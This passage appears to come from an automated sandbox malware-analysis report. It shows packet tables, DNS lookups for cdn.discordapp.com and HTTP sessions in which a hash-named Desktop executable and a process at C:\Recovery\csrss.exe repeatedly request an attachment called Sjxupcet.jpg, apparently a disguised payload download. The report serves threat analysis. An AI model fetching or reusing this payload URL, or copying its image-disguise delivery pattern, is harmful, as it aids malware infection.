                                                  Apr 23, 2022 08:15:18.782069921 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782077074 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782087088 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782093048 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782157898 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782176971 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782187939 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782210112 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782215118 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782258034 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782269955 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782305956 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782310009 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782316923 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782368898 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782394886 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782402039 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782424927 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782433987 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782499075 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782510996 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782516956 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782674074 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782706022 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782712936 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782737017 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782740116 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782766104 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.782771111 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.782792091 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.783004999 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.783058882 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.783083916 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.783113003 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.783147097 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.783152103 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.783236980 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.783258915 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785644054 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785660982 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785671949 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785680056 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785789967 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785798073 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785805941 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785815001 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785824060 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785829067 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785852909 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785857916 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785885096 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785891056 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785898924 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785923958 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.785928965 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.785968065 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.800285101 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800318003 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800415993 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.800430059 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800442934 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.800673962 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800694942 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800745010 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.800750971 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800776958 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.800972939 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.800992966 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.801050901 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.801059008 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.801064968 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.801155090 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.801187992 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.801212072 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.801218033 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.801225901 CEST44349729162.159.133.233192.168.2.6
                                                  Apr 23, 2022 08:15:18.801243067 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.801259995 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.801402092 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:18.803924084 CEST49729443192.168.2.6162.159.133.233
                                                  Apr 23, 2022 08:15:40.061006069 CEST4973080192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:40.077821970 CEST8049730162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:40.077927113 CEST4973080192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:40.078156948 CEST4973080192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:40.094260931 CEST8049730162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:40.099725962 CEST8049730162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:40.315263033 CEST4973080192.168.2.6162.159.129.233
                                                  Apr 23, 2022 08:15:40.318262100 CEST8049730162.159.129.233192.168.2.6
                                                  Apr 23, 2022 08:15:40.318380117 CEST4973080192.168.2.6162.159.129.233
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 23, 2022 08:13:00.560343981 CEST5223553192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:13:00.579828978 CEST53522358.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:13:00.669347048 CEST6368953192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:13:00.693593979 CEST53636898.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:14:37.892050982 CEST4950753192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:14:37.915210962 CEST53495078.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:14:38.099036932 CEST5520153192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:14:38.119575024 CEST53552018.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:14:55.929656029 CEST5929353192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:14:55.949152946 CEST53592938.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:14:56.206944942 CEST5872353192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:14:56.225531101 CEST53587238.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:14:56.657912016 CEST5197153192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:14:56.674438000 CEST53519718.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:14:57.060622931 CEST5659153192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:14:57.078847885 CEST53565918.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:15:18.104471922 CEST6035053192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:15:18.122728109 CEST53603508.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:15:18.176884890 CEST5174853192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:15:18.195018053 CEST53517488.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:15:18.283200026 CEST6111653192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:15:18.299774885 CEST53611168.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:15:18.425379992 CEST5095853192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:15:18.444664955 CEST53509588.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:15:40.028261900 CEST4969553192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:15:40.047482014 CEST53496958.8.8.8192.168.2.6
                                                  Apr 23, 2022 08:15:40.101914883 CEST6160753192.168.2.68.8.8.8
                                                  Apr 23, 2022 08:15:40.123492002 CEST53616078.8.8.8192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Apr 23, 2022 08:13:00.560343981 CEST192.168.2.68.8.8.80x2fc6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.669347048 CEST192.168.2.68.8.8.80xb60aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:37.892050982 CEST192.168.2.68.8.8.80xf6cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:38.099036932 CEST192.168.2.68.8.8.80x6aa6Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:55.929656029 CEST192.168.2.68.8.8.80x5766Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.206944942 CEST192.168.2.68.8.8.80x7200Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.657912016 CEST192.168.2.68.8.8.80x2108Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:57.060622931 CEST192.168.2.68.8.8.80x4a4aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.104471922 CEST192.168.2.68.8.8.80x161fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.176884890 CEST192.168.2.68.8.8.80x1729Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.283200026 CEST192.168.2.68.8.8.80x5ca0Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.425379992 CEST192.168.2.68.8.8.80x80c3Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.028261900 CEST192.168.2.68.8.8.80xb3d4Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.101914883 CEST192.168.2.68.8.8.80x7a99Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Apr 23, 2022 08:13:00.579828978 CEST8.8.8.8192.168.2.60x2fc6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.579828978 CEST8.8.8.8192.168.2.60x2fc6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.579828978 CEST8.8.8.8192.168.2.60x2fc6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.579828978 CEST8.8.8.8192.168.2.60x2fc6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.579828978 CEST8.8.8.8192.168.2.60x2fc6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.693593979 CEST8.8.8.8192.168.2.60xb60aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.693593979 CEST8.8.8.8192.168.2.60xb60aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.693593979 CEST8.8.8.8192.168.2.60xb60aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.693593979 CEST8.8.8.8192.168.2.60xb60aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:13:00.693593979 CEST8.8.8.8192.168.2.60xb60aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:37.915210962 CEST8.8.8.8192.168.2.60xf6cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:37.915210962 CEST8.8.8.8192.168.2.60xf6cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:37.915210962 CEST8.8.8.8192.168.2.60xf6cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:37.915210962 CEST8.8.8.8192.168.2.60xf6cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:37.915210962 CEST8.8.8.8192.168.2.60xf6cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:38.119575024 CEST8.8.8.8192.168.2.60x6aa6No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:38.119575024 CEST8.8.8.8192.168.2.60x6aa6No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:38.119575024 CEST8.8.8.8192.168.2.60x6aa6No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:38.119575024 CEST8.8.8.8192.168.2.60x6aa6No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:38.119575024 CEST8.8.8.8192.168.2.60x6aa6No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:55.949152946 CEST8.8.8.8192.168.2.60x5766No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:55.949152946 CEST8.8.8.8192.168.2.60x5766No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:55.949152946 CEST8.8.8.8192.168.2.60x5766No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:55.949152946 CEST8.8.8.8192.168.2.60x5766No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:55.949152946 CEST8.8.8.8192.168.2.60x5766No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.225531101 CEST8.8.8.8192.168.2.60x7200No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.225531101 CEST8.8.8.8192.168.2.60x7200No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.225531101 CEST8.8.8.8192.168.2.60x7200No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.225531101 CEST8.8.8.8192.168.2.60x7200No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.225531101 CEST8.8.8.8192.168.2.60x7200No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.674438000 CEST8.8.8.8192.168.2.60x2108No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.674438000 CEST8.8.8.8192.168.2.60x2108No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.674438000 CEST8.8.8.8192.168.2.60x2108No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.674438000 CEST8.8.8.8192.168.2.60x2108No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:56.674438000 CEST8.8.8.8192.168.2.60x2108No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:57.078847885 CEST8.8.8.8192.168.2.60x4a4aNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:57.078847885 CEST8.8.8.8192.168.2.60x4a4aNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:57.078847885 CEST8.8.8.8192.168.2.60x4a4aNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:57.078847885 CEST8.8.8.8192.168.2.60x4a4aNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:14:57.078847885 CEST8.8.8.8192.168.2.60x4a4aNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.122728109 CEST8.8.8.8192.168.2.60x161fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.122728109 CEST8.8.8.8192.168.2.60x161fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.122728109 CEST8.8.8.8192.168.2.60x161fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.122728109 CEST8.8.8.8192.168.2.60x161fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.122728109 CEST8.8.8.8192.168.2.60x161fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.195018053 CEST8.8.8.8192.168.2.60x1729No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.195018053 CEST8.8.8.8192.168.2.60x1729No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.195018053 CEST8.8.8.8192.168.2.60x1729No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.195018053 CEST8.8.8.8192.168.2.60x1729No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.195018053 CEST8.8.8.8192.168.2.60x1729No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.299774885 CEST8.8.8.8192.168.2.60x5ca0No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.299774885 CEST8.8.8.8192.168.2.60x5ca0No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.299774885 CEST8.8.8.8192.168.2.60x5ca0No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.299774885 CEST8.8.8.8192.168.2.60x5ca0No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.299774885 CEST8.8.8.8192.168.2.60x5ca0No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.444664955 CEST8.8.8.8192.168.2.60x80c3No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.444664955 CEST8.8.8.8192.168.2.60x80c3No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.444664955 CEST8.8.8.8192.168.2.60x80c3No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.444664955 CEST8.8.8.8192.168.2.60x80c3No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:18.444664955 CEST8.8.8.8192.168.2.60x80c3No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.047482014 CEST8.8.8.8192.168.2.60xb3d4No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.047482014 CEST8.8.8.8192.168.2.60xb3d4No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.047482014 CEST8.8.8.8192.168.2.60xb3d4No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.047482014 CEST8.8.8.8192.168.2.60xb3d4No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.047482014 CEST8.8.8.8192.168.2.60xb3d4No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.123492002 CEST8.8.8.8192.168.2.60x7a99No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.123492002 CEST8.8.8.8192.168.2.60x7a99No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.123492002 CEST8.8.8.8192.168.2.60x7a99No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.123492002 CEST8.8.8.8192.168.2.60x7a99No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Apr 23, 2022 08:15:40.123492002 CEST8.8.8.8192.168.2.60x7a99No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  • cdn.discordapp.com
                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.649716162.159.129.233443C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.649721162.159.130.233443C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  10192.168.2.649726162.159.129.23380C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:15:18.148885012 CEST1619OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:15:18.173129082 CEST1620INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:15:18 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:15:18 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eQRMQwc6nbWXUDubMdKyQfU4Engik9llvwHnL4VDS68I%2B56FU7aAv4UJFB%2B2%2BeKMk8u5KEOLF5rIA6FvxXH%2F50d7mLLtrXZ%2BGQuDZLiqIeHWyv3XzZQ4N2BPJDDj6c0S0tEdOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 700476c27c93699b-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  11192.168.2.649728162.159.129.23380C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:15:18.388786077 CEST1621OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:15:18.413662910 CEST1626INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:15:18 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:15:18 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2tCvkRuZF75wqf4hwElZewipbMHM68p20Qkk%2FN9msXaXGNMrs%2FuhIFf%2FzcO0KPK2sdYH3OANdFAKFDGvz2TGmVxaM%2F9wizBhosUdkEHHFBdPmEW5%2BA%2FLxTMCJeMV2J9O69Bf2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 700476c3ffd79b3d-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  12192.168.2.649730162.159.129.23380C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:15:40.078156948 CEST2422OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:15:40.099725962 CEST2423INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:15:40 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:15:40 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JZ4L3vDnJhgNNqJc%2FuXWNWQhyarp6FU%2B7aVBWuNaqYjDx3zmLZQQkMQZxBGySOUAXGvhqpF9EStzUwGfRBS0Q7z9RcDTICKj0i7aTOS%2FiycNZypqxsP66goHb%2FTkIrtveq2ZcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 7004774b888268ec-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0
                                                  Apr 23, 2022 08:15:40.318262100 CEST2823INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:15:40 GMT
